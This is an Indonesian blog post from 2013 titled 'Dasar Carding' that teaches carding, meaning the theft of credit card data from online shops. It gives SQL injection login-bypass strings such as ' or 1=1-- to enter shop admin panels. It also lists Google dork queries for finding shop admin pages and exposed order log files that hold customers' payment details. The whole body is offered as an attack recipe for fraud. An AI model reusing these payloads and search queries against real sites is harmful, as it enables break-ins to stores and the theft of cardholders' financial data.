RSS

carding

24 Nov

Dasar Carding
1. Teknik Dengan Menggunakan User & Password Admin
Default – SQL Injection Basic
# Teknik ini menggunakan kelemahan dari SQL Injection
String Login, caranya cukup mudah hanya dengan
memasukkan code di bawah ini pada user dan password pada
login di website store admin. Adapun code user dan password
itu diantaranya:
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/
adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :
http://www.namasitusnya.com/shop/admin/shopadmin.asp
Silakan masukkan kombinasi kombinasi password yang telah
saya sebutkan diatas, klo masuk berarti anda berhasil

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang
tersimpan di berbagai server. Bisanya dalam bentuk *.log,
*.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi
ini di web target. Itu tergantung dari imajinasi anda untuk
menemukannya. Biasanya ini di server
berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or
“order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=.%2Forder%2F
order.log
http://www.namasitusnya.la/shopping/DCShop/orders/
orders.txt
Selamat menemukan
by: bagus newbie

 
Tinggalkan komentar

Ditulis oleh pada November 24, 2013 in tekhnik

 

Tag: , ,

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s